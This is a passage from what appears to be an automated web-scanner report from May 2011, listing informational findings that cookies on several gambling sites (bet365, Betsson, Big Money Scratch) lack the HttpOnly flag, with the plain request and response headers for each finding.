The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extra/en/promotions/soccer/bore-draw-money-back HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:24 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fufizjajowzlfy45sho150nb; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:24 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:24 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 98594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.199. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/soccer/soccer-accumulator-bonus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extra/en/promotions/soccer/soccer-accumulator-bonus HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tv4wgmvkxivljf55azj5ogae; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 113999


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.200. https://www.betsson.com/core/StartPlaying/Api/StartPlayingInit.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /core/StartPlaying/Api/StartPlayingInit.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/StartPlaying/Api/StartPlayingInit.ashx HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store
Content-Type: text/javascript; charset=utf-8
Expires: Mon, 01 Jan 0001 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:35 GMT
Connection: close
Content-Length: 1480
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

/* current StartPlaying.Web version: 1.3 */
if(typeof(Betsson_StartPlaying) != "undefined")
{
Betsson_StartPlaying.Popup.workflow = {"Processes":[{"Activities":[{"Action":null,"Arg":null,"Name"
...[SNIP]...

12.201. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/StartPlaying/Scripts/Compiled/StartPlayingApi.js HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Mar 2011 09:14:03 GMT
Accept-Ranges: bytes
ETag: "c2a920d0baeecb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:34 GMT
Connection: close
Content-Length: 4941
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding

var Betsson_StartPlaying={Popup:{workflow:{},startPlayingBaseUrl:"",GetProcessIndex:function(itemName){for(i=0;i<this.workflow.Processes.length;i++){var itm=this.workflow.Processes[i];if(itm.Name==ite
...[SNIP]...

12.202. https://www.betsson.com/start/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /start/en/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /start/en/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=8a90f1f5-60b8-4531-a685-5a21012f097f; expires=Mon, 23-May-2011 12:08:53 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:52 GMT
Connection: close
Content-Length: 42417
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

12.203. https://www.betsson.com/start/is/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /start/is/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /start/is/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:50 GMT
Connection: close
Content-Length: 39256
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

12.204. https://www.betsson.com/web/en/sportsbook/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /web/en/sportsbook/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web/en/sportsbook/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 78630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hrdmunq10h1upatzji4snpvl; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 16 May 2011 12:08:59 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...

12.205. http://www.bigmoneyscratch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bigmoneyscratch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=f5jure3lb3c4ja5502em2o55; path=/; HttpOnly
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:41:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: UniqueVisitorID=A33BADF2D03C7B4113BECB861AAA8512; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:41:39 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Vary: Accept-Encoding
Content-Length: 47633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.206. http://www.bigmoneyscratch.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:56 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.207. http://www.bigmoneyscratch.com/Affiliates.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Affiliates.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:06 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46288


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.208. http://www.bigmoneyscratch.com/ContactUsChat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsChat.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsChat.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:48 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.209. http://www.bigmoneyscratch.com/ContactUsFax.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.210. http://www.bigmoneyscratch.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:20 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.211. http://www.bigmoneyscratch.com/ContactUsTel.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.212. http://www.bigmoneyscratch.com/FAQ.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /FAQ.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95018


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.213. http://www.bigmoneyscratch.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
